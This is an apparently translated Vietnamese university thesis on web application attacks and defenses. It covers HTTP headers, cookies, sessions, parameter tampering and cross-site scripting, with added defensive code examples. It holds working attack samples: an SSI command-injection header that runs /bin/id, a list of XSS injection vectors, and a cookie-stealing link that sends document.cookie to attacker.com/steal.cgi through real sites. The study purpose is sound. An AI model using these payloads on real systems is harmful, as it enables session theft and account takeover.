Web Application Security on the Internet (Bao Mat Ung Dung Web Tren Internet) - Diendandaihoc - VN - 08040603062011
MINISTRY OF EDUCATION AND TRAINING
UNIVERSITY OF SCIENCE, HO CHI MINH CITY
FACULTY OF INFORMATION TECHNOLOGY
DEPARTMENT OF COMPUTER NETWORKS
GRADUATION THESIS
TOPIC:
Supervisor: M.Sc. MAI VN CNG
Students: NGUYN DUY THNG - 9912074, NGUYN MINH THU - 9912156
Faculty of IT (Khoa CNTT)
Acknowledgements
After nearly six months of effort, the thesis "Attack techniques and security of Web applications on the Internet" has been largely completed. Beyond our own best efforts, we received a great deal of encouragement from the university, our teachers, our families and our friends. First of all, we thank our parents for always encouraging us and providing the best conditions for us to study and complete this graduation thesis. We thank the teachers of the University of Science for passing on valuable knowledge to us throughout our studies. In particular, we express our sincere and deep gratitude to Mr. Mai Vn Cng, who devotedly guided and helped us while we worked on this thesis. Thanks also to all the friends who have encouraged and helped us during our studies and in completing this graduation thesis.
Reviewer's comments
TABLE OF CONTENTS

INTRODUCTION ... 7
Organization of the thesis ... 9
PART ONE: THEORETICAL BACKGROUND ... 11
Chapter 1: Introduction to Web applications ... 12
  I. THE CONCEPT OF A WEB APPLICATION ... 13
  II. DESCRIPTION OF HOW A WEB APPLICATION WORKS ... 16
Chapter 2: Related concepts and terms ... 18
  I. HACKER ... 19
  II. HTTP HEADER ... 19
  III. SESSION ... 21
  IV. COOKIE ... 22
  V. PROXY ... 25
Chapter 3: Overview of attack techniques on Web applications ... 26
  I. WEB ACCESS CONTROL ... 27
    I.1. Entering the system through a back door ... 27
  II. SESSION TAKEOVER ... 27
    II.1. Session fixation ... 27
    II.2. Session theft ... 27
  III. EXPLOITING SHORTCOMINGS IN INPUT VALIDATION ... 27
    III.1. Validating data with a browser-side language ... 28
    III.2. Buffer overflow ... 28
    III.3. URL encoding ... 28
    III.4. Meta characters ... 28
    III.5. Path traversal ... 29
    III.6. Injecting code executed in the victim's browser ... 29
    III.7. Adding system commands ... 29
    III.8. Injecting SQL queries ... 30
    III.9. Server-side language ... 30
    III.10. Null character ... 30
    III.11. Parameter manipulation ... 30
  IV. INFORMATION DISCLOSURE ... 31
  V. DENIAL OF SERVICE ... 31
Chapter 4: Parameter manipulation ... 34
  I. URL MANIPULATION ... 35
    I.1. Concept ... 35
    I.2. Some countermeasures ... 36
  II. HIDDEN FORM FIELD MANIPULATION ... 36
    II.1. Concept ... 36
    II.2. Some countermeasures ... 38
  III. COOKIE MANIPULATION ... 39
    III.1. Concept ... 39
    III.2. Some countermeasures ... 40
  IV. HTTP HEADER MANIPULATION ... 41
    IV.1. Concept ... 41
    IV.2. Some countermeasures ... 42
Chapter 5: Injecting code executed in the victim's browser (Cross Site Scripting) ... 43
  I. THE CROSS-SITE SCRIPTING (XSS) ATTACK TECHNIQUE ... 44
  II. THE TRADITIONAL XSS ATTACK METHOD ... 46
  III. SOME WEBSITES WHERE XSS VULNERABILITIES WERE FOUND ... 50
  IV. XSS ATTACKS VIA FLASH ... 51
  V. COUNTERMEASURES ... 54
Chapter 6
  I. THE CONCEPT OF SQL INJECTION ... 57
  II. INTRODUCTION TO THE DATABASE MODEL ... 57
  III. ATTACK METHODS ... 58
    III.1. The SQL Injection attack technique ... 58
    III.2. Attacks based on the SELECT statement ... 60
    III.3. Attacks based on the HAVING clause ... 62
    III.4. Attacks based on the UNION operator ... 62
    III.5. Attacks based on the INSERT statement ... 69
    III.6. Attacks based on STORED PROCEDUREs ... 70
    III.7. Advanced ... 70
      III.7.1. Strings without single quotes ... 70
      III.7.2. Second-order attacks ... 71
      III.7.3. Evading controls ... 74
      III.7.4. Using Extended Stored Procedures ... 75
        III.7.4.1. Using the Extended Stored Procedures built into SQL Server ... 75
        III.7.4.2. Using self-created Extended Stored Procedures ... 76
        III.7.4.3. Importing a text file into a table ... 77
  IV. COUNTERMEASURES ... 77
    IV.1. Validating data ... 78
    IV.2. SQL Server Lockdown ... 81
Chapter 7: Session takeover (Session Management) ... 83
  I. OVERVIEW OF SESSION IDs ... 84
  II. SESSION FIXATION ... 85
    II.1. Session ID attacks via URL parameters ... 88
    II.2. Session ID attacks via hidden form fields ... 89
    II.3. Session ID attacks via cookies ... 89
    II.4. Countermeasures ... 91
  III. SESSION THEFT ... 92
    III.1. Session ID prediction ... 93
    III.2. Session ID brute force ... 93
    III.3. Using code to steal the session ... 94
    III.4. Countermeasures
    III.5. The difference between session hijacking and session fixation
Chapter 8: Buffer Overflow
  I. CONCEPT
  II. MEMORY ORGANIZATION
    II.1. Stack
    II.2. Push and Pop
    II.3. How functions work
    II.4. Shell code
  III. SOME WAYS TO CAUSE BUFFER OVERFLOWS THROUGH WEB APPLICATIONS
  IV. COUNTERMEASURES
Chapter 9: Denial of Service (DoS)
  I. CONCEPT ... 109
  II. WAYS OF BEING ATTACKED BY DOS ... 109
  III. ATTACK TECHNIQUES ... 110
    III.1. The TCP three-way handshake ... 110
    III.2. Exploiting TCP for the traditional SYN flood ... 112
    III.3. Attacks on bandwidth ... 113
      III.3.1. First attack type ... 113
      III.3.2. Second attack type ... 113
    III.4. Attacks on system resources ... 117
  IV. COUNTERMEASURES ... 117
Chapter 10: Some other attack techniques ... 119
  I. URL ENCODING ... 120
    I.1. Concept ... 120
    I.2. Some countermeasures ... 121
  II. PATH TRAVERSAL ATTACKS ... 121
    II.1. Concept ... 121
    II.2. Some countermeasures ... 122
  III. NULL CHARACTER ATTACKS ... 123
    III.1. Concept ... 123
    III.2. Some countermeasures ... 123
  IV. SERVER-SIDE LANGUAGE ... 123
    IV.1. Concept ... 123
    IV.2. Attack method ... 125
    IV.3. Countermeasures ... 125
Chapter 11: Summary of the hacker's attack process ... 127
  I. GATHERING INFRASTRUCTURE-LEVEL INFORMATION ABOUT THE TARGET ... 128
  II. SURVEYING THE WEB APPLICATION ... 131
  III. ATTACKING ... 132
Chapter 12: Summary of countermeasures ... 134
  I. FOR NETWORK ADMINISTRATORS ... 135
  II. FOR WEB APPLICATION DESIGNERS ... 137
  III. FOR WEB APPLICATION USERS ... 139
PART THREE: THE WEB CHECKER PROGRAM ... 140
Chapter 13: The Web Checker program ... 141
  I. SPECIFICATION OF THE WEB CHECKER PROGRAM ... 142
    I.1. Overview ... 142
    I.2. Requirements ... 142
      I.2.1. Functional requirements ... 142
      I.2.2. Non-functional requirements ... 143
  II. ARCHITECTURE OF THE WEB CHECKER PROGRAM ... 143
    II.1. Architecture of the Web Checker program ... 143
    II.2. Communication between the program and the Web server ... 144
  III. IMPLEMENTATION ... 145
    III.1. Implementation language ... 145
    III.2. Implementation method ... 145
      III.2.1. Using a Dialog-based interface model ... 145
      III.2.2. Using an ActiveX Control (Microsoft Web Browser) ... 145
      III.2.3. Using the Windows Sockets 2 programming interface ... 146
      III.2.4. Main classes and functions implemented in the program ... 146
    III.3. Program description and usage ... 151
      III.3.1. Program screens ... 151
      III.3.2. Usage ... 152
  IV. EVALUATION OF THE PROGRAM ... 153
    IV.1. Achievements ... 153
    IV.2. Limitations ... 153
CONCLUSION ... 155
  I. ACHIEVEMENTS ... 156
  II. FUTURE DIRECTIONS ... 157
APPENDIX ... 158
INTRODUCTION
Today, as the Internet has become widespread, organizations and individuals alike want to present their information on the information superhighway and to carry out transactions online. The problem that arises is that as the scope of Web applications widens, so does the likelihood of defects and attacks; they become targets for many attackers with varying motives, sometimes simply to test one's skills or to show off to others. Along with the relentless growth of the Internet and its services, the number of attacks on the Internet has grown exponentially. While the mass media increasingly talk about the possibilities of accessing information through the Internet, the specialist literature has begun to address the problem of securing data on computers connected to the Internet. According to figures from CERT (Computer Emergency Response Team), the number of Internet attacks reported to that organization was under 200 in 1989, about 400 in 1991, 1400 in 1993, 2241 in 1994, and 5315 in 2001. These attacks were aimed at every kind of computer on the Internet: those of large companies such as AT&T and IBM, universities, government agencies, military organizations, banks... Some attacks were enormous in scale (up to 100,000 computers attacked). Moreover, these figures are only the tip of the iceberg. A very large share of attacks are never reported, for many reasons, among which are the fear of losing reputation, or simply that the system administrators never knew their systems were under attack. A typical case is the attack on IBM's commercial software in March 2001: two hackers found a vulnerability in the application through which anyone with a Web browser could take over user accounts, even the administrator's. Not only has the number of attacks grown rapidly; attack methods have also become ever more sophisticated and organized. On the other hand, administering network systems demands administrators with solid knowledge and experience of networks, and weak administration creates many openings for hackers to exploit. Also according to CERT, attacks in the 1988-1989 period mainly consisted of guessing user names and passwords (UserID/password) or using bugs in programs and operating systems (security holes) to disable protection, whereas recent attacks also include IP address spoofing, monitoring information passing over the network, hijacking remote sessions (telnet or rlogin), and installing trojans or worms to monitor or control computers... Protecting information on the Internet is therefore necessary in order to protect data, user information and systems. When security is discussed, most security experts concentrate on the safety of the network and the operating system. To protect a system, the method usually chosen is a firewall. However, according to CSI/FBI, 78% of those surveyed had a firewall in place and yet 59% were attacked via the Internet; more specifically, according to the CSI/FBI Computer Crime and Security Survey, total losses from attacks on Web applications between 1997 and 2000 amounted to 626 million US dollars.
Although automated vulnerability-scanning tools help Web programmers a great deal, they still cannot prevent everything, because Web technology is developing rapidly (with the emphasis mainly on aesthetics and speed) and new weaknesses keep appearing. Attacks do not stay within the framework of the detection techniques; they are flexible and multiply with the mistakes of system administrators and application programmers. This thesis was carried out with the aim of studying and analysing security vulnerabilities in web applications (with demonstration programs) and proposing ways to fix them. In parallel, the thesis also implements a program that automatically detects vulnerabilities in Web applications, to help Web programmers gain the experience to avoid such mistakes when building applications.
Organization of the thesis
The thesis consists of 13 chapters divided into 3 parts:
Part one: THEORETICAL BACKGROUND. This part has 3 chapters:
+ Chapter 1: Introduction to Web applications
+ Chapter 2: Some related concepts and terms
+ Chapter 3: Overview of attack techniques on Web applications
Part two: ATTACK TECHNIQUES AND COUNTERMEASURES. This part has 9 chapters, from chapter 4 to chapter 12; the first 7 of them discuss the attack techniques, and each chapter ends with the countermeasures for that technique. Chapter 11 describes the hacker's attack process, and chapter 12 presents the most general countermeasures.
Part three: THE WEB CHECKER PROGRAM. This consists of the final chapter, which presents and explains the program. The thesis ends with a conclusion that summarizes the issues presented and some directions for future development, followed by the list of references.
PART ONE: THEORETICAL BACKGROUND
Chapter 1: Introduction to Web applications
The thesis was carried out to study the techniques used to attack Web sites and to propose countermeasures. This first chapter therefore briefly introduces a few basic concepts, which form the foundation for the content of the later parts.
Presentation layer: this layer is responsible for displaying data to the user; it may additionally contain applications that produce the layout of the web page.
Application layer: the processing core of the Web application. It processes the information the user requests, makes decisions and sends the results to the presentation layer. This layer is usually implemented with programming technologies such as CGI, Java, .NET, PHP or ColdFusion, deployed on servers such as IBM WebSphere, WebLogic, Apache, IIS...
Data layer: usually database management systems (DBMS), responsible for managing the data files and access rights.
Modelling the operation of a Web application:
Where:
Client (also called the browser): Internet Explorer, Netscape Navigator...
Server: Apache, IIS, ...
Database management system: SQL Server, MySQL, DB2, Access.
In addition, a solution commonly used to protect a network is the firewall. It acts as an outer barrier around the network, and its main function is to control the flow of information between computers. A firewall can be seen as an information filter: it decides and enforces whether one computer may access another, or whether one network may access another. Firewalls are typically used to:
Allow or deny services accessing the outside.
Allow or deny services from the outside accessing the inside.
Control which addresses may connect, and block addresses.
A firewall operates on IP packets, so it controls access by the user's machine
...exploit Web vulnerabilities to extend their attacks into other, unrelated systems.
Chapter 2: Related concepts and terms
I. HACKER
"Hacker" is a term used for people who sabotage network systems. Hackers are usually computer experts. Hackers do not create the holes in a system, but they are people with a deep understanding of operating systems, database management systems, programming languages... They use their knowledge to search for and exploit vulnerabilities in network systems. Some hackers stop at discovering the bugs they find and reporting them to security staff or program developers; they are regarded as WhiteHat. Other hackers use the vulnerabilities to carry out unauthorized exploitation for sabotage or personal gain; they are regarded as BlackHat. Because the term "hacker" is so widespread, this thesis uses "hacker" in place of "attacker" throughout.
II. HTTP HEADER
The HTTP header is the leading part (header) of the information that client and server send to each other. The information the client sends to the server is called an HTTP request, and what the server sends back to the client is an HTTP response. An HTTP header usually consists of several lines, each containing a parameter name and a value. Some parameters may appear in both request and response headers, while others are used only in one of the two. Example:
Request header:
GET /tintuc/homnay.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Connection: Keep-Alive
Host: localhost
Referer: http://localhost/lienket.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Accept-Encoding: gzip, deflate
o The first line is the request line, giving the request method (GET or POST), the requested address (/tintuc/homnay.asp) and the HTTP version (HTTP/1.1).
o Next come the parameters, for example:
  Accept-Language: the language used in the web page.
  Host: the address of the server.
  Referer: the address of the referring web page.
o The header of the HTTP request ends with a blank line.
Response header:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 13 Jul 2000 05:46:53 GMT
Content-Length: 2291
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ; path=/
Cache-control: private

<HTML> <BODY> ...
o The first line is the status line, giving the HTTP version in use (HTTP/1.1), the status code (200) and the status text (OK).
o Next come the parameters.
o Then a blank line marks the end of the header, followed by the body of the HTTP response.
The list of HTTP header parameters is given in Appendix A.
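The request and response above, split into start line, header fields and body the way a server or proxy must do before it trusts any field. This is an added example, not code from the thesis; both messages are transcribed from the page, and the response body is just the page's "<HTML> <BODY> ..." placeholder.

```python
# Added example, not part of the thesis: parse the raw HTTP request and response
# shown above. Header names are case-insensitive and every occurrence is kept,
# so a duplicated field (two Content-Length values, say) stays visible instead
# of silently overwriting the first one.

REQUEST = (
    "GET /tintuc/homnay.asp HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-us\r\n"
    "Connection: Keep-Alive\r\n"
    "Host: localhost\r\n"
    "Referer: http://localhost/lienket.asp\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "\r\n"
)

RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Date: Thu, 13 Jul 2000 05:46:53 GMT\r\n"
    "Content-Length: 2291\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ; path=/\r\n"
    "Cache-control: private\r\n"
    "\r\n"
    "<HTML> <BODY> ..."
)


def parse_http_message(raw):
    """Return a dict describing the message; raise ValueError on malformed input."""
    head, blank, body = raw.partition("\r\n\r\n")
    if not blank:
        raise ValueError("header is not terminated by a blank line")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed start line: %r" % lines[0])

    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        # No colon, an empty name, or whitespace around the name (the obsolete
        # line-folding form) is rejected rather than guessed at.
        if not colon or not name or name != name.strip():
            raise ValueError("malformed header line: %r" % line)
        headers.setdefault(name.lower(), []).append(value.strip())

    if parts[0].startswith("HTTP/"):
        msg = {"type": "response", "version": parts[0],
               "status": int(parts[1]), "reason": parts[2]}
    else:
        msg = {"type": "request", "method": parts[0],
               "target": parts[1], "version": parts[2]}
    msg["headers"] = headers
    msg["body"] = body
    return msg


def header(msg, name):
    """Single value of a header, or None; raises if the field is duplicated."""
    values = msg["headers"].get(name.lower(), [])
    if len(values) > 1:
        raise ValueError("duplicate header %s" % name)
    return values[0] if values else None


if __name__ == "__main__":
    req = parse_http_message(REQUEST)
    print(req["method"], req["target"], header(req, "Host"))
    resp = parse_http_message(RESPONSE)
    print(resp["status"], header(resp, "Set-Cookie"))
```

The strict handling of the blank line and of header names is deliberate: a parser that is lenient about where the header ends, or that keeps only the last of two conflicting fields, is what lets one party read a message differently from the next one in the chain.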
III. SESSION
HTTP is a generic, object-oriented, stateless protocol, meaning that HTTP does not retain the working state between browser and server. This shortcoming causes difficulties for some Web applications, because the server cannot know what state the browser was in before. To solve this, Web applications introduce the notion of a session. A SessionID is a string that authenticates the session. Some servers issue a SessionID to the user when they view a page on the server. To maintain the session, the sessionID is usually stored in:
  a URL variable
  a hidden form variable
  a cookie
A session exists only for an allowed period of time, which is configured on the server or by the running application. The server automatically releases the session to reclaim system resources.
IV. COOKIE
Cookies are small, structured pieces of data shared between the server and the user's browser. Cookies are stored as small text files, created by the application to store, retrieve and identify information about the users visiting the Web site and the areas of the site they pass through. This information may include the user's name or identifier, password, preferences, habits... Cookies are accepted by the user's browser and saved on the local hard disk; however, the browser does not always support cookies, depending on whether the user allows them to be stored. On later visits to the site, the application can reuse the information in the cookie (for example the login information for Yahoo Messenger!) so that the user does not have to log in again or supply the other information again. Cookies are classified along two axes, secure/non-secure and persistent/non-persistent, which gives 4 kinds of cookie:
  Persistent and Secure
  Persistent and Non-Secure
  Non-Persistent and Secure
  Non-Persistent and Non-Secure
Persistent cookies are stored as .txt files on the client (for example Netscape Navigator keeps all cookies in a single cookie.txt file, whereas Internet Explorer keeps many *.txt files, one cookie per file) for a defined period of time. Non-persistent cookies are kept in the client's RAM and are destroyed when the web page is closed or when the page sends a delete command. Secure cookies can only be sent over HTTPS (SSL). Non-secure cookies can be sent over either HTTPS or HTTP. In effect, for a secure cookie the server provides a secure transport mode. The components of a cookie are:
Domain      www.redhat.com
Flag        FALSE
Path        /
Secure      FALSE
Expiration  1154029490
Name        Apache
Value       64.3.40.151.16018996349247480
Flag: TRUE/FALSE - determines whether other machines in the same domain may access the cookie.
Path: the range of addresses that may access the cookie. For example, if the path is /tracuu then addresses in the /tracuu directory and in all its subdirectories, such as /tracuu/baomat, may access this cookie. If the value is / then the cookie may be accessed by every address in the domain of the site that created it.
Secure: TRUE/FALSE - determines whether this is a secure cookie, i.e. whether the connection uses SSL.
Expiration: the cookie's expiry time, in seconds since 00:00:00 GMT on 01/01/1970. If this value is not set, the browser treats the cookie as non-persistent, keeps it only in RAM and deletes it when the browser is closed.
Name: the variable name (Apache in this case).
Value: for the cookie created above, the value of Apache is 64.3.40.151.16018996349247480, the expiry date is 27/07/2006, and the domain is http://www.redhat.com.
For example, the following line in the HTTP header creates a cookie:
Set-Cookie:Apache="64.3.40.151.16018996349247480"; path="/"; domain="www.redhat.com"; path_spec; expires="2006-07-27 19:39:15Z"; version=0
IE stores its cookies as many files, one cookie per file, under [C:]\Documents and Settings\[username]\Cookies (Win2000); on Win9x the cookies directory is [C:]\Windows\cookies. The maximum size of a cookie is 4 KB. The maximum number of cookies per domain is 20. A cookie that is deleted as soon as the browser is closed is called a session cookie.
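The Set-Cookie line above, parsed into the fields the table lists, classified into one of the four kinds, and checked against the path-scoping rule given for the Path attribute. This is an added example, not code from the thesis; the second cookie (sid=7f3a) is a constructed session cookie.

```python
# Added example, not part of the thesis: parse a Set-Cookie value into
# Domain / Path / Secure / Expiration / Name / Value, classify the cookie, and
# decide whether a request path falls inside the cookie's Path.

SET_COOKIE_LINE = ('Apache="64.3.40.151.16018996349247480"; path="/"; '
                   'domain="www.redhat.com"; path_spec; '
                   'expires="2006-07-27 19:39:15Z"; version=0')


def parse_set_cookie(value):
    """Parse one Set-Cookie header value into a dict; quotes around values are removed."""
    pieces = [p.strip() for p in value.split(";")]
    name, eq, val = pieces[0].partition("=")
    if not eq or not name:
        raise ValueError("cookie must start with name=value")
    cookie = {"name": name.strip(), "value": val.strip().strip('"'),
              "domain": None, "path": "/", "secure": False,
              "httponly": False, "expires": None}
    for attr in pieces[1:]:
        if not attr:
            continue
        key, has_eq, aval = attr.partition("=")
        key = key.strip().lower()
        aval = aval.strip().strip('"')
        if key == "secure":
            cookie["secure"] = True
        elif key == "httponly":
            cookie["httponly"] = True
        elif key == "expires" and has_eq:
            cookie["expires"] = aval
        elif key == "domain" and has_eq:
            cookie["domain"] = aval.lower().lstrip(".")
        elif key == "path" and has_eq and aval.startswith("/"):
            cookie["path"] = aval
        # other attributes (version, path_spec, max-age, ...) are ignored here
    return cookie


def cookie_kind(cookie):
    """One of the four kinds the thesis lists: persistent means an expiry is set."""
    persistent = "Persistent" if cookie["expires"] is not None else "Non-Persistent"
    secure = "Secure" if cookie["secure"] else "Non-Secure"
    return "%s and %s" % (persistent, secure)


def path_matches(cookie_path, request_path):
    """True if a request for request_path may receive a cookie scoped to cookie_path.

    /tracuu matches /tracuu and /tracuu/baomat but not /tracuux: the prefix
    has to end at a directory boundary, otherwise a sibling path would leak it.
    """
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"


if __name__ == "__main__":
    c = parse_set_cookie(SET_COOKIE_LINE)
    print(c["name"], c["value"], c["domain"], c["path"], cookie_kind(c))
    # Constructed session cookie: no expiry, so it lives only in memory.
    s = parse_set_cookie("sid=7f3a; Path=/tracuu; Secure; HttpOnly")
    print(cookie_kind(s), path_matches(s["path"], "/tracuu/baomat"))
```

The redhat.com cookie comes out as "Persistent and Non-Secure": it carries an expiry but no Secure flag, so it would be sent over plain HTTP as well. A session identifier like the ASPSESSIONID shown earlier should instead be issued with Secure (and HttpOnly, which keeps it away from the script-based theft described in chapter 5).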
V. PROXY
A proxy gives users Internet access for particular protocols, or for a set of protocols, running on a dual-homed host or bastion host. The user's client programs go through the proxy server as an intermediary in place of the real server the user wants to talk to. The proxy server examines the requests from the client and decides whether or not to honour them; if a request is accepted, the proxy server connects to the real server on behalf of the client and keeps forwarding the client's requests to the server, and the server's replies to the client. The proxy server is thus a bridge between server and client.
Chapter 3: Overview of attack techniques on Web applications
III. Exploiting shortcomings in input validation
IV. Information disclosure
V. Denial of service
What follows is a brief overview of the techniques used to attack Web applications, classified by the degree of harm they do to the application.
This is an attack technique that lets the hacker impersonate a legitimate user after the victim has logged into the system, by recovering their session ID from where it is stored: a cookie, a URL parameter or a hidden form variable.
Using special characters (explained in more detail in the appendix), the hacker can insert into the submitted data characters that belong to command strings, such as <script> in the XSS technique or -- in SQL, in order to have commands executed.
III.11. Parameter manipulation
The information exchanged between server and browser is held in variables such as URL variables, hidden form variables, cookies... Because control over these variables has not received due attention, a hacker can exploit them by modifying their values, for example to steal a user's session or to change the price of an item.
Buffer overflow
Denial of service
Some other techniques:
  o Null character
  o URL encoding
  o Exploiting path access to a file
  o Server-side language
PART TWO: ATTACK TECHNIQUES AND COUNTERMEASURES
Chapter 4: Parameter manipulation
Parameter manipulation is the technique of altering important information carried in cookies, URLs or hidden form variables. The Cross-Site Scripting, SessionID, SQL Injection, Buffer Overflow... techniques also rely on these parameters to complete the hacker's attack steps. One can say that the transmitted parameters are the starting point for everything a hacker does when attacking an application. That is why this is the first chapter of part two; its purpose is also to support the presentation of the chapters that follow.
Where:
+ username is the name of the user whose password is to be changed.
+ newpass is the new password for username.
However, by changing the parameters as follows:
http://www.nganhang.com/example?user=admin&newpass=111111
the request becomes:
POST /cuahang.pl HTTP/1.0
...
giaca=0.99
Besides changing the contents of hidden form variables, the hacker can also alter other elements of the form, such as the maximum length of an input field, in order to carry out a BUFFER OVERFLOW attack,
II.2. Some countermeasures
Hidden form variables should only be used to display data in the browser; their values must not be used for processing inside the application.
Use the HTTP_REFERER variable to check where an incoming request came from; however, a hacker can use a proxy to hide the real origin, so HTTP_REFERER should not be trusted too far as a check.
Join the names and values of the hidden variables into a single string. Digest that string with MD5 or another one-way hash and store the result in a hidden field called the "reference string". When the form values are submitted, the same operations are repeated with the same key that was fixed in advance, and the result is compared with the reference string; if they do not match, the values in the form have been altered.
Use a sessionID that refers to information stored in the database.
The cookie says this user is not an Admin (ADMIN=no), but what happens if the hacker changes this field? The hacker could rewrite it as follows:
Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
...or not. However, a hacker can write their own program to manipulate HTTP headers (view their contents, create new ones) or use one of the free proxies that allow the data sent from the browser to be changed. The hacker can also attack directly by using telnet to send an HTTP request to the server. Example 4.IV.1-1:
su-2.05# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Referer: www.redhat.com/login.asp
User-Agent: <!--#exec cmd="/bin/id"-->

HTTP/1.1 200 OK
Date: Mon, 17 Dec 2001 20:39:02 GMT
Server:
Connection: close
Content-Type: text/html
The part in bold is the content the hacker changed.
Example 4.IV.1-2: The Referer header holds the URL of the page from which the request was sent. Some applications therefore check this header field to make sure the request came from the application's own page. The aim is to stop a hacker from saving the page to their own machine, editing the form attributes, defeating client-side validation or server-side includes, and then submitting it. But this check fails, because the hacker can edit the Referer header so that the request appears to come from the legitimate page:
Referer: www.redhat.com/login.asp
Remarks:
No important information exchanged between browser and server should be stored as a plain string; it should be encrypted, and it should also be checked against the data held in the database or in the server's cache, to guard against tampered content. Validating input data is also essential, since almost every attack technique relies on data entered through the URL, hidden form variables or cookies, such as the Cross-Site Scripting attack in the next chapter or SQL Injection in chapter 6.
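The "reference string" countermeasure from section II.2, applied to the giaca=0.99 manipulation above, together with the server-side role lookup that makes an ADMIN=yes cookie irrelevant. This is an added example, not code from the thesis: the thesis names MD5, whereas this example uses HMAC-SHA256 (a keyed one-way hash in the sense the thesis describes) with a constructed server secret; the field names giaca, sanpham and chuoimau, and the session store, are assumptions modelled on the page's examples.

```python
# Added example, not part of the thesis: tamper detection for hidden form
# fields with a keyed hash, and a role check that reads server-side session
# state instead of a client-editable cookie.
import hmac
import hashlib

SERVER_SECRET = b"constructed-demo-secret-change-me"   # assumption: kept server-side only
TAG_FIELD = "chuoimau"                                  # hidden field carrying the reference string


def canonical(fields):
    """Deterministic, unambiguous encoding: sorted name=value pairs joined by '&'.
    Plain concatenation (name + value) would let 'giaca' + '10.99' collide with
    'giaca1' + '0.99', so a delimiter and a fixed order are required."""
    return "&".join("%s=%s" % (k, v) for k, v in sorted(fields.items()))


def sign_fields(fields, secret=SERVER_SECRET):
    return hmac.new(secret, canonical(fields).encode("utf-8"), hashlib.sha256).hexdigest()


def render_form(fields):
    """Server side: emit the hidden fields plus the reference string."""
    out = dict(fields)
    out[TAG_FIELD] = sign_fields(fields)
    return out


def verify_submission(submitted, secret=SERVER_SECRET):
    """Server side: recompute the tag over the received fields and compare it in
    constant time. Any edited, added or removed field invalidates the tag."""
    fields = dict(submitted)
    tag = fields.pop(TAG_FIELD, None)
    if tag is None:
        return False
    return hmac.compare_digest(tag, sign_fields(fields, secret))


def is_admin(session_store, session_id):
    """Role lookup from server-side session state, keyed by the session ID the
    cookie carries; session_store is a constructed dict standing in for the
    database the thesis refers to."""
    return session_store.get(session_id, {}).get("role") == "admin"


if __name__ == "__main__":
    form = render_form({"sanpham": "ao thun", "giaca": "19.99"})
    print(verify_submission(form))                       # True
    tampered = dict(form, giaca="0.99")                  # the cuahang.pl manipulation
    print(verify_submission(tampered))                   # False
    sessions = {"LKLDFFKCINFLDMFHCBCBMFLJ": {"user": "bob", "role": "user"}}
    print(is_admin(sessions, "LKLDFFKCINFLDMFHCBCBMFLJ"))   # False, whatever the cookie says
```

Because the key never leaves the server, a client that knows the hash algorithm still cannot produce a valid tag for a changed price; and because the role comes from the session record rather than from the cookie, rewriting ADMIN=no to ADMIN=yes changes nothing.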
Chapter 5: Injecting code executed in the victim's browser (Cross Site Scripting)
III. Some websites where XSS vulnerabilities were found.
IV. XSS attacks via Flash.
V. Countermeasures.
or: http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
The part in bold is the code added in order to steal the victim's cookies. In the examples 5.I-1 above, most of the URL prefixes are the addresses of real Web applications (e.g. http://www.micro­soft.com/education, http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/...); by exploiting the way parameters are passed on the URL, a hacker can easily append cookie-stealing code. Example 5.I-1 only illustrates the simplest way of adding code to a Web page, through the URL. In practice there are many ways to inject JavaScript for an XSS attack. The hacker can easily use the Document Object Model (DOM) to change the context and the content of the Web application. Below is a list of places where code can be injected. Example 5.I-2:
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
(source: http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-05-15/0)
Summary of the steps involved:
Step 1: The hacker knows that the user is using a Web application with an XSS vulnerability.
Step 2: The user receives a link, by email or on the site itself (for example in a guestbook or a banner, where the hacker can easily place a link of their own). The hacker usually draws the user in with phrases that provoke curiosity, such as "Check your account" or "An attractive prize is waiting for you"...
Step 3: The information (cookie, name, password) is forwarded to the hacker's server.
Step 4: The hacker has set up a CGI program (steal.cgi in this example) or a Web page that records the stolen information into a file.
Step 5: Once the required information has been received, the hacker can use it to break into the user's account.
Example 5.II-1: to exploit the vulnerability in the hotwired.lycos.com application, the hacker can proceed as follows:
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a href="http://hotwired.lycos.com/webmonkey/index1.html?tw=<script>document.location.replace('http://www.attacker.com/steal.cgi?'+document.cookie);</script>">
An attractive prize is waiting for you
</a>
</body>
</html>
